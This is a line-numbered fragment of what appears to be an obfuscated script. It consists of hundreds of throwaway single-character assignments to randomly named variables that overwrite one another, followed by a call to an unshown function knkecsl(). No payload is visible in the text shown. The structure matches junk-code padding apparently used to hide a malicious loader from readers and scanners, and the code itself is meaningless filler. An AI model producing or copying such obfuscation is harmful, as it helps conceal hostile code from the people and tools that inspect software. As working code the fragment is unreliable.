706 | novlq = "0"; | |
707 | oyjxrynxn = "%"; | |
708 | hjgzo = "a"; | |
709 | hjgzo = "w"; | |
710 | hjgzo = "p"; | |
711 | hjgzo = "y"; | |
712 | hjgzo = "G"; | |
713 | hjgzo = "j"; | |
714 | hjgzo = "t"; | |
715 | hjgzo = "M"; | |
716 | hjgzo = "j"; | |
717 | hjgzo = "H"; | |
718 | hjgzo = "h"; | |
719 | hjgzo = "F"; | |
720 | hjgzo = "T"; | |
721 | hjgzo = "q"; | |
722 | hjgzo = "O"; | |
723 | hjgzo = "q"; | |
724 | hjgzo = "H"; | |
725 | hjgzo = "D"; | |
726 | hjgzo = "s"; | |
727 | hjgzo = "s"; | |
728 | hjgzo = "Y"; | |
729 | hjgzo = "K"; | |
730 | hjgzo = "s"; | |
731 | hjgzo = "v"; | |
732 | hjgzo = "O"; | |
733 | hjgzo = "H"; | |
734 | hjgzo = "U"; | |
735 | hjgzo = "b"; | |
736 | hjgzo = "g"; | |
737 | hjgzo = "k"; | |
738 | hjgzo = "S"; | |
739 | hjgzo = "z"; | |
740 | hjgzo = "g"; | |
741 | hjgzo = "&"; | |
742 | fgtvyq = "d"; | |
743 | fgtvyq = "t"; | |
744 | fgtvyq = "a"; | |
745 | fgtvyq = "n"; | |
746 | fgtvyq = "i"; | |
747 | fgtvyq = "a"; | |
748 | fgtvyq = "l"; | |
749 | fgtvyq = "D"; | |
750 | fgtvyq = "P"; | |
751 | fgtvyq = "m"; | |
752 | fgtvyq = "y"; | |
753 | fgtvyq = "o"; | |
754 | fgtvyq = "V"; | |
755 | fgtvyq = "m"; | |
756 | fgtvyq = "k"; | |
757 | fgtvyq = "F"; | |
758 | fgtvyq = "n"; | |
759 | fgtvyq = "I"; | |
760 | fgtvyq = "T"; | |
761 | fgtvyq = "z"; | |
762 | fgtvyq = "E"; | |
763 | fgtvyq = "M"; | |
764 | fgtvyq = "f"; | |
765 | fgtvyq = "j"; | |
766 | fgtvyq = "D"; | |
767 | fgtvyq = "O"; | |
768 | fgtvyq = "w"; | |
769 | fgtvyq = "Q"; | |
770 | fgtvyq = "Z"; | |
771 | fgtvyq = "R"; | |
772 | fgtvyq = "f"; | |
773 | qhuxohbd = "m"; | |
774 | qhuxohbd = "w"; | |
775 | yenwlzaf = "q"; | |
776 | yenwlzaf = "s"; | |
777 | yenwlzaf = "k"; | |
778 | yenwlzaf = "x"; | |
779 | yenwlzaf = "A"; | |
780 | yenwlzaf = "h"; | |
781 | yenwlzaf = "t"; | |
782 | yenwlzaf = "N"; | |
783 | yenwlzaf = "j"; | |
784 | yenwlzaf = "K"; | |
785 | yenwlzaf = "C"; | |
786 | yenwlzaf = "M"; | |
787 | yenwlzaf = "N"; | |
788 | yenwlzaf = "o"; | |
789 | yenwlzaf = "F"; | |
790 | yenwlzaf = "e"; | |
791 | yenwlzaf = "r"; | |
792 | yenwlzaf = "p"; | |
793 | yenwlzaf = "l"; | |
794 | yenwlzaf = "b"; | |
795 | yenwlzaf = "s"; | |
796 | yenwlzaf = "h"; | |
797 | yenwlzaf = "l"; | |
798 | yenwlzaf = "E"; | |
799 | yenwlzaf = "h"; | |
800 | yenwlzaf = "I"; | |
801 | yenwlzaf = "w"; | |
802 | yenwlzaf = "z"; | |
803 | yenwlzaf = "o"; | |
804 | yenwlzaf = "K"; | |
805 | yenwlzaf = "z"; | |
806 | yenwlzaf = "L"; | |
807 | yenwlzaf = "F"; | |
808 | yenwlzaf = "U"; | |
809 | yenwlzaf = "P"; | |
810 | yenwlzaf = "r"; | |
811 | yenwlzaf = "7"; | |
812 | dozeedrw = "C"; | |
813 | dozeedrw = "M"; | |
814 | dozeedrw = "D"; | |
815 | dozeedrw = "k"; | |
816 | dozeedrw = "N"; | |
817 | dozeedrw = "s"; | |
818 | dozeedrw = "b"; | |
819 | dozeedrw = "n"; | |
820 | dozeedrw = "U"; | |
821 | dozeedrw = "k"; | |
822 | dozeedrw = "P"; | |
823 | dozeedrw = "p"; | |
824 | dozeedrw = "H"; | |
825 | dozeedrw = "B"; | |
826 | dozeedrw = "G"; | |
827 | dozeedrw = "y"; | |
828 | dozeedrw = "j"; | |
829 | dozeedrw = "f"; | |
830 | dozeedrw = "j"; | |
831 | dozeedrw = "D"; | |
832 | dozeedrw = "r"; | |
833 | dozeedrw = "N"; | |
834 | dozeedrw = "f"; | |
835 | dozeedrw = "G"; | |
836 | dozeedrw = "T"; | |
837 | dozeedrw = "n"; | |
838 | dozeedrw = "d"; | |
839 | nnnwpvtmn = "h"; | |
840 | nnnwpvtmn = "g"; | |
841 | nnnwpvtmn = "c"; | |
842 | nnnwpvtmn = "D"; | |
843 | nnnwpvtmn = "j"; | |
844 | nnnwpvtmn = "S"; | |
845 | nnnwpvtmn = "i"; | |
846 | nnnwpvtmn = "R"; | |
847 | nnnwpvtmn = "F"; | |
848 | nnnwpvtmn = "C"; | |
849 | nnnwpvtmn = "t"; | |
850 | nnnwpvtmn = "S"; | |
851 | nnnwpvtmn = "d"; | |
852 | nnnwpvtmn = "T"; | |
853 | nnnwpvtmn = "T"; | |
854 | nnnwpvtmn = "x"; | |
855 | nnnwpvtmn = "L"; | |
856 | nnnwpvtmn = "V"; | |
857 | nnnwpvtmn = "f"; | |
858 | nnnwpvtmn = "r"; | |
859 | nnnwpvtmn = "m"; | |
860 | nnnwpvtmn = "y"; | |
861 | nnnwpvtmn = "Y"; | |
862 | nnnwpvtmn = "X"; | |
863 | nnnwpvtmn = "f"; | |
864 | nnnwpvtmn = "O"; | |
865 | nnnwpvtmn = "r"; | |
866 | uctkjkgg = "a"; | |
867 | uctkjkgg = "V"; | |
868 | uctkjkgg = "d"; | |
869 | uctkjkgg = "T"; | |
870 | uctkjkgg = "H"; | |
871 | uctkjkgg = "E"; | |
872 | uctkjkgg = "m"; | |
873 | afmngkg = "U"; | |
874 | afmngkg = "X"; | |
875 | afmngkg = "K"; | |
876 | afmngkg = "W"; | |
877 | afmngkg = "m"; | |
878 | afmngkg = "f"; | |
879 | afmngkg = "H"; | |
880 | afmngkg = "y"; | |
881 | afmngkg = "Q"; | |
882 | afmngkg = "t"; | |
883 | afmngkg = "u"; | |
884 | afmngkg = "w"; | |
885 | afmngkg = "v"; | |
886 | afmngkg = "Q"; | |
887 | afmngkg = "s"; | |
888 | afmngkg = "j"; | |
889 | afmngkg = "v"; | |
890 | afmngkg = "N"; | |
891 | afmngkg = "Y"; | |
892 | afmngkg = "L"; | |
893 | afmngkg = "z"; | |
894 | afmngkg = "P"; | |
895 | afmngkg = "S"; | |
896 | afmngkg = "b"; | |
897 | afmngkg = "E"; | |
898 | afmngkg = "i"; | |
899 | afmngkg = "F"; | |
900 | afmngkg = "a"; | |
901 | afmngkg = "M"; | |
902 | afmngkg = "I"; | |
903 | afmngkg = "m"; | |
904 | afmngkg = "K"; | |
905 | afmngkg = "p"; | |
906 | afmngkg = "O"; | |
907 | afmngkg = "t"; | |
908 | afmngkg = "n"; | |
909 | afmngkg = "g"; | |
910 | afmngkg = "B"; | |
911 | afmngkg = "J"; | |
912 | afmngkg = "M"; | |
913 | afmngkg = "J"; | |
914 | afmngkg = "d"; | |
915 | afmngkg = "Q"; | |
916 | mmnmmnyla = "w"; | |
917 | mmnmmnyla = "s"; | |
918 | mmnmmnyla = "y"; | |
919 | mmnmmnyla = "M"; | |
920 | mmnmmnyla = "v"; | |
921 | mmnmmnyla = "S"; | |
922 | mmnmmnyla = "T"; | |
923 | mmnmmnyla = "w"; | |
924 | mmnmmnyla = "o"; | |
925 | mmnmmnyla = "Q"; | |
926 | mmnmmnyla = "G"; | |
927 | mmnmmnyla = "c"; | |
928 | mmnmmnyla = "Q"; | |
929 | mmnmmnyla = "d"; | |
930 | mmnmmnyla = "a"; | |
931 | mmnmmnyla = "J"; | |
932 | mmnmmnyla = "n"; | |
933 | mmnmmnyla = "T"; | |
934 | bynshf = "j"; | |
935 | bynshf = "g"; | |
936 | bynshf = "D"; | |
937 | bynshf = "O"; | |
938 | bynshf = "s"; | |
939 | bynshf = "H"; | |
940 | bynshf = "e"; | |
941 | bynshf = "Y"; | |
942 | bynshf = "R"; | |
943 | bynshf = "g"; | |
944 | bynshf = "V"; | |
945 | bynshf = "M"; | |
946 | bynshf = "c"; | |
947 | bynshf = "d"; | |
948 | bynshf = "O"; | |
949 | bynshf = "I"; | |
950 | bynshf = "s"; | |
951 | bynshf = "T"; | |
952 | bynshf = "m"; | |
953 | bynshf = "j"; | |
954 | bynshf = "U"; | |
955 | bynshf = "x"; | |
956 | bynshf = "O"; | |
957 | bynshf = "v"; | |
958 | bynshf = "p"; | |
959 | bynshf = "F"; | |
960 | bynshf = "V"; | |
961 | bynshf = "B"; | |
962 | bynshf = "e"; | |
963 | bynshf = "4"; | |
964 | zqiwd = "m"; | |
965 | zqiwd = "o"; | |
966 | zqiwd = "r"; | |
967 | zqiwd = "R"; | |
968 | zqiwd = "I"; | |
969 | zqiwd = "E"; | |
970 | zqiwd = "U"; | |
971 | zqiwd = "r"; | |
972 | zqiwd = "X"; | |
973 | zqiwd = "d"; | |
974 | zqiwd = "J"; | |
975 | zqiwd = "u"; | |
976 | zqiwd = "U"; | |
977 | zqiwd = "o"; | |
978 | zqiwd = "s"; | |
979 | rawvak = "K"; | |
980 | rawvak = "f"; | |
981 | rawvak = "S"; | |
982 | rawvak = "H"; | |
983 | rawvak = "V"; | |
984 | rawvak = "b"; | |
985 | rawvak = "W"; | |
986 | rawvak = "b"; | |
987 | rawvak = "N"; | |
988 | rawvak = "e"; | |
989 | rawvak = "E"; | |
990 | rawvak = "D"; | |
991 | rawvak = "F"; | |
992 | rawvak = "v"; | |
993 | rawvak = "V"; | |
994 | rawvak = "i"; | |
995 | rawvak = "A"; | |
996 | rawvak = "U"; | |
997 | rawvak = ":"; | |
998 | ctwykybuy = "D"; | |
999 | ctwykybuy = "O"; | |
1000 | ctwykybuy = "S"; | |
1001 | ctwykybuy = "v"; | |
1002 | ctwykybuy = "V"; | |
1003 | ctwykybuy = "P"; | |
1004 | ctwykybuy = "p"; | |
1005 | ctwykybuy = "M"; | |
1006 | ctwykybuy = "S"; | |
1007 | ctwykybuy = "A"; | |
1008 | ctwykybuy = "p"; | |
1009 | ctwykybuy = "o"; | |
1010 | ctwykybuy = "z"; | |
1011 | ctwykybuy = "V"; | |
1012 | ctwykybuy = "y"; | |
1013 | ctwykybuy = "p"; | |
1014 | ctwykybuy = "O"; | |
1015 | ctwykybuy = "E"; | |
1016 | ctwykybuy = "Q"; | |
1017 | ctwykybuy = "a"; | |
1018 | ctwykybuy = "g"; | |
1019 | ctwykybuy = "u"; | |
1020 | ctwykybuy = "L"; | |
1021 | ctwykybuy = "R"; | |
1022 | ctwykybuy = "X"; | |
1023 | ctwykybuy = "P"; | |
1024 | ctwykybuy = "b"; | |
1025 | ctwykybuy = "i"; | |
1026 | ctwykybuy = "s"; | |
1027 | ctwykybuy = "t"; | |
1028 | ctwykybuy = "C"; | |
1029 | ctwykybuy = "r"; | |
1030 | ctwykybuy = "B"; | |
1031 | ctwykybuy = "G"; | |
1032 | ctwykybuy = "j"; | |
1033 | ctwykybuy = "L"; | |
1034 | ctwykybuy = "P"; | |
1035 | ctwykybuy = "T"; | |
1036 | ctwykybuy = "S"; | |
1037 | ctwykybuy = "v"; | |
1038 | ctwykybuy = "d"; | |
1039 | ctwykybuy = "z"; | |
1040 | ctwykybuy = "l"; | |
1041 | wwpjdnm = "r"; | |
1042 | wwpjdnm = "M"; | |
1043 | wwpjdnm = "s"; | |
1044 | wwpjdnm = "w"; | |
1045 | wwpjdnm = "J"; | |
1046 | wwpjdnm = "b"; | |
1047 | wwpjdnm = "G"; | |
1048 | wwpjdnm = "g"; | |
1049 | wwpjdnm = "Z"; | |
1050 | wwpjdnm = "R"; | |
1051 | wwpjdnm = "f"; | |
1052 | wwpjdnm = "x"; | |
1053 | wwpjdnm = "b"; | |
1054 | wwpjdnm = "o"; | |
1055 | wwpjdnm = "m"; | |
1056 | wwpjdnm = "w"; | |
1057 | wwpjdnm = "x"; | |
1058 | wwpjdnm = "K"; | |
1059 | wwpjdnm = "d"; | |
1060 | wwpjdnm = "N"; | |
1061 | wwpjdnm = "u"; | |
1062 | wwpjdnm = "g"; | |
1063 | wwpjdnm = "E"; | |
1064 | wwpjdnm = "f"; | |
1065 | wwpjdnm = "o"; | |
1066 | wwpjdnm = "i"; | |
1067 | wwpjdnm = "r"; | |
1068 | wwpjdnm = "t"; | |
1069 | qmnvsef = "j"; | |
1070 | qmnvsef = "J"; | |
1071 | qmnvsef = "o"; | |
1072 | qmnvsef = "r"; | |
1073 | qmnvsef = "T"; | |
1074 | qmnvsef = "m"; | |
1075 | qmnvsef = "x"; | |
1076 | qmnvsef = "J"; | |
1077 | qmnvsef = "b"; | |
1078 | qmnvsef = "z"; | |
1079 | qmnvsef = "H"; | |
1080 | qmnvsef = "B"; | |
1081 | qmnvsef = "j"; | |
1082 | qmnvsef = "f"; | |
1083 | qmnvsef = "r"; | |
1084 | qmnvsef = "a"; | |
1085 | qmnvsef = "J"; | |
1086 | qmnvsef = "z"; | |
1087 | qmnvsef = "h"; | |
1088 | qmnvsef = "X"; | |
1089 | qmnvsef = "q"; | |
1090 | vnboflw = "h"; | |
1091 | vnboflw = "t"; | |
1092 | vnboflw = "K"; | |
1093 | vnboflw = "t"; | |
1094 | vnboflw = "K"; | |
1095 | vnboflw = "S"; | |
1096 | vnboflw = "I"; | |
1097 | vnboflw = "s"; | |
1098 | vnboflw = "V"; | |
1099 | vnboflw = "d"; | |
1100 | vnboflw = "E"; | |
1101 | vnboflw = "n"; | |
1102 | vnboflw = "i"; | |
1103 | vnboflw = "j"; | |
1104 | vnboflw = "p"; | |
1105 | vnboflw = "E"; | |
1106 | vnboflw = "B"; | |
1107 | vnboflw = "F"; | |
1108 | vnboflw = "G"; | |
1109 | vnboflw = "Z"; | |
1110 | vnboflw = "E"; | |
1111 | vnboflw = "B"; | |
1112 | vnboflw = "B"; | |
1113 | vnboflw = "M"; | |
1114 | vnboflw = "x"; | |
1115 | vnboflw = "G"; | |
1116 | vnboflw = "U"; | |
1117 | vnboflw = "c"; | |
1118 | vnboflw = "w"; | |
1119 | vnboflw = "J"; | |
1120 | vnboflw = "Z"; | |
1121 | vnboflw = "5"; | |
1122 | mtpgdahzz = "H"; | |
1123 | mtpgdahzz = "F"; | |
1124 | mtpgdahzz = "I"; | |
1125 | mtpgdahzz = "m"; | |
1126 | mtpgdahzz = "o"; | |
1127 | etaofp = "E"; | |
1128 | etaofp = "J"; | |
1129 | etaofp = "N"; | |
1130 | etaofp = "R"; | |
1131 | etaofp = "j"; | |
1132 | etaofp = "V"; | |
1133 | etaofp = "p"; | |
1134 | etaofp = "S"; | |
1135 | etaofp = "P"; | |
1136 | etaofp = "o"; | |
1137 | etaofp = "L"; | |
1138 | etaofp = "p"; | |
1139 | etaofp = "Z"; | |
1140 | etaofp = "x"; | |
1141 | etaofp = "b"; | |
1142 | etaofp = "N"; | |
1143 | etaofp = "o"; | |
1144 | etaofp = "k"; | |
1145 | etaofp = "A"; | |
1146 | etaofp = "k"; | |
1147 | etaofp = "D"; | |
1148 | etaofp = "a"; | |
1149 | etaofp = "P"; | |
1150 | etaofp = "o"; | |
1151 | etaofp = "i"; | |
1152 | etaofp = "G"; | |
1153 | etaofp = "l"; | |
1154 | etaofp = "c"; | |
1155 | etaofp = "Z"; | |
1156 | etaofp = "k"; | |
1157 | etaofp = "T"; | |
1158 | etaofp = "R"; | |
1159 | etaofp = "l"; | |
1160 | etaofp = "i"; | |
1161 | etaofp = "u"; | |
1162 | etaofp = "X"; | |
1163 | etaofp = "J"; | |
1164 | etaofp = "r"; | |
1165 | etaofp = "g"; | |
1166 | etaofp = "o"; | |
1167 | etaofp = "o"; | |
1168 | etaofp = "K"; | |
1169 | czodbvlv = "W"; | |
1170 | czodbvlv = "U"; | |
1171 | czodbvlv = "X"; | |
1172 | czodbvlv = "@"; | |
1173 | nxdgonoot = "E"; | |
1174 | nxdgonoot = "B"; | |
1175 | nxdgonoot = "e"; | |
1176 | nxdgonoot = "p"; | |
1177 | nxdgonoot = "r"; | |
1178 | nxdgonoot = "K"; | |
1179 | nxdgonoot = "q"; | |
1180 | nxdgonoot = "b"; | |
1181 | nxdgonoot = "Z"; | |
1182 | nxdgonoot = "W"; | |
1183 | nxdgonoot = "E"; | |
1184 | nxdgonoot = "t"; | |
1185 | nxdgonoot = "r"; | |
1186 | nxdgonoot = "O"; | |
1187 | nxdgonoot = "F"; | |
1188 | nxdgonoot = "\""; | |
1189 | jyugwkb = "c"; | |
1190 | jyugwkb = "I"; | |
1191 | jyugwkb = "j"; | |
1192 | jyugwkb = "Q"; | |
1193 | jyugwkb = "h"; | |
1194 | jyugwkb = "t"; | |
1195 | jyugwkb = "m"; | |
1196 | jyugwkb = "D"; | |
1197 | jyugwkb = "w"; | |
1198 | jyugwkb = "D"; | |
1199 | jyugwkb = "y"; | |
1200 | jyugwkb = "R"; | |
1201 | jyugwkb = "O"; | |
1202 | jyugwkb = "A"; | |
1203 | jyugwkb = "m"; | |
1204 | jyugwkb = "p"; | |
1205 | jyugwkb = "t"; | |
1206 | jyugwkb = "g"; | |
1207 | jyugwkb = "I"; | |
1208 | jyugwkb = "L"; | |
1209 | jyugwkb = "E"; | |
1210 | jyugwkb = "D"; | |
1211 | jyugwkb = "W"; | |
1212 | whbrb = "M"; | |
1213 | whbrb = "O"; | |
1214 | whbrb = "H"; | |
1215 | whbrb = "d"; | |
1216 | whbrb = "B"; | |
1217 | whbrb = "c"; | |
1218 | whbrb = "V"; | |
1219 | whbrb = "T"; | |
1220 | whbrb = "Q"; | |
1221 | whbrb = "l"; | |
1222 | whbrb = "c"; | |
1223 | whbrb = "g"; | |
1224 | whbrb = "T"; | |
1225 | whbrb = "K"; | |
1226 | whbrb = "P"; | |
1227 | whbrb = "k"; | |
1228 | whbrb = "O"; | |
1229 | qkirrbo = "X"; | |
1230 | qkirrbo = "U"; | |
1231 | qkirrbo = "e"; | |
1232 | qkirrbo = "m"; | |
1233 | qkirrbo = "I"; | |
1234 | qkirrbo = "r"; | |
1235 | qkirrbo = "R"; | |
1236 | qkirrbo = "v"; | |
1237 | qkirrbo = "E"; | |
1238 | qkirrbo = "h"; | |
1239 | qkirrbo = "K"; | |
1240 | qkirrbo = "i"; | |
1241 | qkirrbo = "y"; | |
1242 | qkirrbo = "t"; | |
1243 | qkirrbo = "X"; | |
1244 | qkirrbo = "X"; | |
1245 | qkirrbo = "B"; | |
1246 | qkirrbo = "z"; | |
1247 | qkirrbo = "r"; | |
1248 | qkirrbo = "U"; | |
1249 | qkirrbo = "a"; | |
1250 | qkirrbo = "P"; | |
1251 | qkirrbo = "l"; | |
1252 | qkirrbo = "x"; | |
1253 | qkirrbo = "Y"; | |
1254 | qkirrbo = "x"; | |
1255 | qkirrbo = "u"; | |
1256 | estxq = "w"; | |
1257 | estxq = "J"; | |
1258 | estxq = "v"; | |
1259 | estxq = "a"; | |
1260 | estxq = "l"; | |
1261 | estxq = "d"; | |
1262 | estxq = "s"; | |
1263 | estxq = "O"; | |
1264 | estxq = "N"; | |
1265 | estxq = "U"; | |
1266 | estxq = "w"; | |
1267 | estxq = "E"; | |
1268 | estxq = "c"; | |
1269 | estxq = "Y"; | |
1270 | estxq = "g"; | |
1271 | estxq = "Z"; | |
1272 | estxq = "Q"; | |
1273 | estxq = "N"; | |
1274 | estxq = "c"; | |
1275 | estxq = "j"; | |
1276 | estxq = "k"; | |
1277 | estxq = "i"; | |
1278 | estxq = "F"; | |
1279 | estxq = "x"; | |
1280 | estxq = "A"; | |
1281 | estxq = "t"; | |
1282 | estxq = "B"; | |
1283 | estxq = "Q"; | |
1284 | estxq = "H"; | |
1285 | estxq = "M"; | |
1286 | estxq = "H"; | |
1287 | estxq = "I"; | |
1288 | qoegnlurb = "D"; | |
1289 | qoegnlurb = "s"; | |
1290 | qoegnlurb = "s"; | |
1291 | qoegnlurb = "y"; | |
1292 | qoegnlurb = "j"; | |
1293 | qoegnlurb = "A"; | |
1294 | qoegnlurb = "t"; | |
1295 | qoegnlurb = "E"; | |
1296 | qoegnlurb = "Q"; | |
1297 | qoegnlurb = "y"; | |
1298 | qoegnlurb = "P"; | |
1299 | qoegnlurb = "N"; | |
1300 | qoegnlurb = "X"; | |
1301 | qoegnlurb = "r"; | |
1302 | qoegnlurb = "c"; | |
1303 | qoegnlurb = "l"; | |
1304 | qoegnlurb = "V"; | |
1305 | qoegnlurb = "o"; | |
1306 | qoegnlurb = "T"; | |
1307 | qoegnlurb = "o"; | |
1308 | qoegnlurb = "B"; | |
1309 | qoegnlurb = "u"; | |
1310 | qoegnlurb = "Q"; | |
1311 | qoegnlurb = "x"; | |
1312 | qoegnlurb = "N"; | |
1313 | qoegnlurb = "M"; | |
1314 | qoegnlurb = "R"; | |
1315 | qoegnlurb = "h"; | |
1316 | qoegnlurb = "q"; | |
1317 | qoegnlurb = "Q"; | |
1318 | qoegnlurb = "T"; | |
1319 | qoegnlurb = "e"; | |
1320 | qoegnlurb = "U"; | |
1321 | qoegnlurb = "j"; | |
1322 | qoegnlurb = "c"; | |
1323 | qoegnlurb = "s"; | |
1324 | qoegnlurb = "k"; | |
1325 | qoegnlurb = "s"; | |
1326 | qoegnlurb = "V"; | |
1327 | qoegnlurb = "Z"; | |
1328 | qoegnlurb = " "; | |
1329 | sorwmzxkr = "m"; | |
1330 | sorwmzxkr = "V"; | |
1331 | sorwmzxkr = "z"; | |
1332 | sorwmzxkr = "q"; | |
1333 | sorwmzxkr = "n"; | |
1334 | sorwmzxkr = "W"; | |
1335 | sorwmzxkr = "P"; | |
1336 | sorwmzxkr = "g"; | |
1337 | sorwmzxkr = "q"; | |
1338 | sorwmzxkr = "C"; | |
1339 | sorwmzxkr = "d"; | |
1340 | sorwmzxkr = "m"; | |
1341 | sorwmzxkr = "b"; | |
1342 | sorwmzxkr = "L"; | |
1343 | sorwmzxkr = "W"; | |
1344 | sorwmzxkr = "q"; | |
1345 | sorwmzxkr = "r"; | |
1346 | sorwmzxkr = "C"; | |
1347 | sorwmzxkr = "V"; | |
1348 | sorwmzxkr = "q"; | |
1349 | sorwmzxkr = "e"; | |
1350 | sorwmzxkr = "f"; | |
1351 | sorwmzxkr = "1"; | |
1352 | yrlplvx = "B"; | |
1353 | yrlplvx = "x"; | |
1354 | yrlplvx = "h"; | |
1355 | yrlplvx = "z"; | |
1356 | yrlplvx = "l"; | |
1357 | yrlplvx = "s"; | |
1358 | yrlplvx = "k"; | |
1359 | yrlplvx = "i"; | |
1360 | yrlplvx = "Z"; | |
1361 | yrlplvx = "y"; | |
1362 | yrlplvx = "P"; | |
1363 | yrlplvx = "A"; | |
1364 | yrlplvx = "A"; | |
1365 | yrlplvx = "n"; | |
1366 | yrlplvx = "B"; | |
1367 | yrlplvx = "r"; | |
1368 | yrlplvx = "T"; | |
1369 | yrlplvx = "t"; | |
1370 | yrlplvx = "b"; | |
1371 | bkhue = "W"; | |
1372 | bkhue = "c"; | |
1373 | bkhue = "A"; | |
1374 | bkhue = "N"; | |
1375 | bkhue = "z"; | |
1376 | bkhue = "C"; | |
1377 | bkhue = "s"; | |
1378 | bkhue = "e"; | |
1379 | bkhue = "m"; | |
1380 | bkhue = "p"; | |
1381 | bkhue = "b"; | |
1382 | bkhue = "p"; | |
1383 | bkhue = "M"; | |
1384 | bkhue = "y"; | |
1385 | bkhue = "u"; | |
1386 | bkhue = "H"; | |
1387 | dizpgh = "Y"; | |
1388 | dizpgh = "6"; | |
1389 | ticey = "l"; | |
1390 | ticey = "F"; | |
1391 | ticey = "k"; | |
1392 | ticey = "Q"; | |
1393 | ticey = "V"; | |
1394 | ticey = "A"; | |
1395 | ticey = "D"; | |
1396 | ticey = "o"; | |
1397 | ticey = "A"; | |
1398 | ticey = "h"; | |
1399 | ticey = "x"; | |
1400 | ticey = "d"; | |
1401 | ticey = "w"; | |
1402 | ticey = "U"; | |
1403 | ticey = "r"; | |
1404 | ticey = "G"; | |
1405 | ticey = "W"; | |
1406 | ticey = "D"; | |
1407 | ticey = "K"; | |
1408 | ticey = "n"; | |
1409 | ticey = "B"; | |
1410 | ticey = "V"; | |
1411 | ticey = "d"; | |
1412 | ticey = "U"; | |
1413 | ticey = "o"; | |
1414 | ticey = "o"; | |
1415 | ticey = "M"; | |
1416 | ticey = "i"; | |
1417 | ticey = "I"; | |
1418 | ticey = "I"; | |
1419 | ticey = "W"; | |
1420 | ticey = "B"; | |
1421 | ticey = "p"; | |
1422 | ticey = "z"; | |
1423 | ticey = "k"; | |
1424 | ticey = "y"; | |
1425 | ticey = "m"; | |
1426 | ticey = "T"; | |
1427 | ticey = "A"; | |
1428 | ticey = "u"; | |
1429 | ticey = "u"; | |
1430 | ticey = "M"; | |
1431 | ticey = "3"; | |
1432 | fegpk = "B"; | |
1433 | fegpk = "H"; | |
1434 | fegpk = "f"; | |
1435 | fegpk = "f"; | |
1436 | fegpk = "r"; | |
1437 | fegpk = "d"; | |
1438 | fegpk = "U"; | |
1439 | fegpk = "i"; | |
1440 | fegpk = "T"; | |
1441 | fegpk = "F"; | |
1442 | fegpk = "Z"; | |
1443 | fegpk = "a"; | |
1444 | ptvohnpnk = "d"; | |
1445 | ptvohnpnk = "A"; | |
1446 | ptvohnpnk = "M"; | |
1447 | ptvohnpnk = "d"; | |
1448 | ptvohnpnk = "G"; | |
1449 | ptvohnpnk = "o"; | |
1450 | ptvohnpnk = "K"; | |
1451 | ptvohnpnk = "u"; | |
1452 | ptvohnpnk = "G"; | |
1453 | ptvohnpnk = "Q"; | |
1454 | ptvohnpnk = "t"; | |
1455 | ptvohnpnk = "B"; | |
1456 | ptvohnpnk = "s"; | |
1457 | ptvohnpnk = "q"; | |
1458 | ptvohnpnk = "k"; | |
1459 | ptvohnpnk = "F"; | |
1460 | ptvohnpnk = "M"; | |
1461 | ptvohnpnk = "o"; | |
1462 | ptvohnpnk = "J"; | |
1463 | ptvohnpnk = "e"; | |
1464 | ptvohnpnk = "p"; | |
1465 | ptvohnpnk = "n"; | |
1466 | ptvohnpnk = "n"; | |
1467 | knkecsl ( ); |
|